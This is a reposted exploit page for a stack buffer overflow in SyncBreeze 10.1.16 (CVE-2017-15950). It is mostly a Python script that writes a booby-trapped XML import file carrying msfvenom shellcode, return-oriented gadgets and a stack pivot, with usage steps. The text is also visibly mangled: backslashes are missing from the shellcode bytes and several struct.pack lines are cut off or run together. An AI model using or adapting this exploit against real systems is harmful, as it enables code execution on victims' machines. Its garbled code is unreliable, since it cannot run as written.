SyncBreeze 10.1.16 Buffer Overflow ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 30th, 2021 📆 | 8157 Views ⚑

0

SyncBreeze 10.1.16 Buffer Overflow ≈ Packet Storm

# Exploit Title: SyncBreeze 10.1.16 – XML Parsing Stack-based Buffer Overflow
# Date: 03/27/2021
# Author: Filipe Oliveira – filipecenturiao[at]hotmail.com Rafael Machado – nnszs[at]protonmail.com
# Vendor: https://www.syncbreeze.com/
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html
# Version: SyncBreeze v10.1.16 x86
# Tested on: Windows 10 x64 (19042.867)
# CVE: CVE-2017-15950

Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file.

# -*- coding: utf-8 -*-

import struct

# badchars
#x00x0ax0dx20x27
#x81x82x83x84x85x86x87x88
#x89x8Ax8Bx8Cx8Dx8Ex8Fx90
#x91x92x93x94x95x96x97x98
#x99x9Ax9Bx9Cx9Dx9Ex9FxA0
#xA1xA2xA3xA4xA5xA6xA7xA8
#xA9xAAxABxACxADxAExAFxB0
#xB1xB2xB3xB4xB5xB6xB7xB8
#xB9xBAxBBxBCxBDxBExBFxC0
#xC1xC2xC3xC4xC5xC6xC7xC8
#xC9xCAxCBxCCxCDxCExCFxD0
#xD1xD2xD3xD4xD5xD6xD7xD8
#xD9xDAxDBxDCxDDxDExDFxE0
#xE1xE2xE3xE4xE5xE6xE7xE8
#xE9xEAxEBxECxEDxEExEFxF0
#xF1xF2xF3xF4xF5xF6xF7xF8
#xF9xFAxFBxFCxFDxFExFF

# Shellcode payload size: 432 bytes
# msfvenom -a x86 –platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b ‘x00x0Ax0Dx20x27’ -v shellcode -f python

shellcode = b””
shellcode += b”x50x59x49x49x49x49x49x49x49x49x49″
shellcode += b”x49x49x49x49x49x49x49x37x51x5ax6a”
shellcode += b”x41x58x50x30x41x30x41x6bx41x41x51″
shellcode += b”x32x41x42x32x42x42x30x42x42x41x42″
shellcode += b”x58x50x38x41x42x75x4ax49x6bx4cx69″
shellcode += b”x78x4ex62x75x50x77x70x35x50x45x30″
shellcode += b”x4bx39x59x75x55x61x39x50x52x44x4e”
shellcode += b”x6bx42x70x50x30x6ex6bx42x72x54x4c”
shellcode += b”x6cx4bx70x52x74x54x4cx4bx62x52x66″
shellcode += b”x48x44x4fx48x37x61x5ax51x36x45x61″
shellcode += b”x39x6fx6ex4cx75x6cx43x51x71x6cx65″
shellcode += b”x52x56x4cx47x50x4bx71x38x4fx74x4d”
shellcode += b”x37x71x49x57x38x62x7ax52x52x72x36″
shellcode += b”x37x4cx4bx63x62x42x30x6cx4bx31x5a”
shellcode += b”x57x4cx4cx4bx32x6cx36x71x31x68x4a”
shellcode += b”x43x47x38x47x71x4ax71x76x31x6cx4b”
shellcode += b”x36x39x67x50x66x61x58x53x4cx4bx70″
shellcode += b”x49x66x78x59x73x34x7ax53x79x6ex6b”
shellcode += b”x50x34x4cx4bx66x61x4ex36x55x61x39″
shellcode += b”x6fx4cx6cx4ax61x4ax6fx34x4dx67x71″
shellcode += b”x48x47x67x48x69x70x71x65x59x66x54″
shellcode += b”x43x63x4dx79x68x75x6bx73x4dx67x54″
shellcode += b”x44x35x79x74x72x78x4ex6bx53x68x71″
shellcode += b”x34x57x71x5ax73x52x46x6cx4bx36x6c”
shellcode += b”x72x6bx6cx4bx76x38x75x4cx67x71x68″
shellcode += b”x53x6ex6bx57x74x4ex6bx63x31x78x50″
shellcode += b”x6fx79x73x74x47x54x64x64x53x6bx31″
shellcode += b”x4bx63x51x50x59x63x6ax43x61x39x6f”
shellcode += b”x59x70x73x6fx31x4fx62x7ax4ex6bx44″
shellcode += b”x52x6ax4bx4ex6dx53x6dx73x5ax63x31″
shellcode += b”x4cx4dx4dx55x6fx42x75x50x47x70x33″
shellcode += b”x30x46x30x50x68x74x71x6cx4bx42x4f”
shellcode += b”x6ex67x39x6fx6ex35x6fx4bx58x70x78″
shellcode += b”x35x79x32x46x36x33x58x79x36x4cx55″
shellcode += b”x4fx4dx6dx4dx39x6fx6ax75x55x6cx63″
shellcode += b”x36x61x6cx45x5ax6dx50x49x6bx39x70″
shellcode += b”x32x55x75x55x6dx6bx57x37x64x53x74″
shellcode += b”x32x52x4fx50x6ax53x30x61x43x59x6f”
shellcode += b”x78x55x73x53x30x61x30x6cx72x43x43″
shellcode += b”x30x41x41″

# padding to crash buffer
basura = struct.pack(‘

# gadgets to move payload pointer into EAX
GAD1 = struct.pack(‘GAD2 = struct.pack(‘

# padding to reach buffer address stored in ebp
basura2 = struct.pack(‘

# padding for stack pivot

padding = struct.pack(‘padding2 = struct.pack(‘

# stack pivot to reach an area with more space for gadgets on the stack
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret

pivot = struct.pack(‘

# final payload

fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode

# write payload to xml file

payload = open(“xplSyncBreeze.xml”, “wb”)
payload.write(“< ?xml version="1.0" encoding="UTF-8"?>nn”.encode(‘utf-8’))

payload.write(“payload.write(fruta)
payload.write(“‘>nn”.encode(‘utf-8’))

payload.close()

Source link

Tagged with:



Leave a Reply